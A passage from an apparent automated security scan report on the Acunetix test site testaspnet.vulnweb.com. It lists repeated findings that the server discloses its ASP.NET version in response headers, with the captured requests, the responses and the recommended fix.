          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        14. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 17888
          
          
          Response body (17888 bytes)
          
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        15. GET http://testaspnet.vulnweb.com/rssFeed.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (220 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/xml; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2118
          
          
          Response body (2118 bytes)
          
            
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        16. GET http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (315 bytes)
          GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 12954
          
          
          Response body (12954 bytes)
          
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        17. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        18. POST http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Content-Length: 1415
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1415 bytes)
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          
          
          Response body (0 bytes)
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        19. POST http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Content-Length: 1721
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1721 bytes)
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          
          
          Response body (0 bytes)
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        20. POST http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Content-Length: 1539
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1539 bytes)
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          
          
          Response body (0 bytes)
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        21. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
